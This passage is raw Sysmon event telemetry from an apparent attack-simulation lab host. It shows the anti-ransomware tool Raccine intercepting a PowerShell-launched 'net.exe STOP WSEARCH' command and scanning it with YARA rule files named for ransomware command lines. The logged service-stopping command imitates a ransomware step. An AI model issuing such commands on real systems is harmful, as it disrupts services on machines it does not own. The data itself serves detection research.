Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244892Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.688{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5532-61B2-AF08-010000000E02}6060C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002244891Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.688{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5532-61B2-AF08-010000000E02}6060C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002244890Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.688{9DBE88B5-5532-61B2-AF08-010000000E02}6060C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_ransomware_command_lines.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac7A8A.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002244887Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.672{9DBE88B5-5532-61B2-AE08-010000000E02}73162860C:\Windows\system32\conhost.exe{9DBE88B5-5532-61B2-AD08-010000000E02}7916C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244881Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.661{9DBE88B5-3A8E-61AE-DBA7-000000000E02}4492968C:\Windows\system32\csrss.exe{9DBE88B5-5532-61B2-AD08-010000000E02}7916C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002244880Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.660{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5532-61B2-AD08-010000000E02}7916C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002244879Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.661{9DBE88B5-5532-61B2-AD08-010000000E02}7916C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_raccine_kills.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac7A8A.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002244876Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.645{9DBE88B5-5532-61B2-AC08-010000000E02}61606692C:\Windows\system32\conhost.exe{9DBE88B5-5532-61B2-AB08-010000000E02}4776C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244870Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.633{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5532-61B2-AB08-010000000E02}4776C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002244869Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.632{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5532-61B2-AB08-010000000E02}4776C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002244868Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.632{9DBE88B5-5532-61B2-AB08-010000000E02}4776C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_powershell_invocation.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac7A8A.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002244865Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.597{9DBE88B5-5532-61B2-AA08-010000000E02}46005984C:\Windows\system32\conhost.exe{9DBE88B5-5532-61B2-A908-010000000E02}7332C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244859Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.569{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5532-61B2-A908-010000000E02}7332C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002244858Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.569{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5532-61B2-A908-010000000E02}7332C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002244857Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.552{9DBE88B5-5532-61B2-A908-010000000E02}7332C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ext-vars-test.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac7A8A.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' STOP WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" STOP WSEARCH 10341000x80000000000000002244854Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.548{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002244839Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.541{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002244773Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.500{9DBE88B5-C32E-61A8-0C00-000000000E02}8482116C:\Windows\system32\svchost.exe{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244771Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.494{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002244756Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.487{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002244690Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.447{9DBE88B5-C32E-61A8-0C00-000000000E02}8482116C:\Windows\system32\svchost.exe{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244689Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.446{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+5894|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244687Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.441{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002244672Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.433{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002244596Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.286{9DBE88B5-C32E-61A8-0C00-000000000E02}8482116C:\Windows\system32\svchost.exe{9DBE88B5-5532-61B2-A608-010000000E02}7540C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244595Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.285{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5532-61B2-A708-010000000E02}7160C:\Windows\system32\net.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+57ef|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x80000000000000002244594Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.282{9DBE88B5-5532-61B2-A608-010000000E02}7540ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\Rac7A8A.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002244593Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.275{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5532-61B2-A708-010000000E02}7160C:\Windows\system32\net.exe0x1c3aC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+c6f00|C:\Windows\System32\KERNELBASE.dll+c6e21|C:\Program Files\Raccine\Raccine.exe+1876|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244587Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:50.274{9DBE88B5-5532-61B2-A608-010000000E02}75407028C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5532-61B2-A708-010000000E02}7160C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+1848|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002244586Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 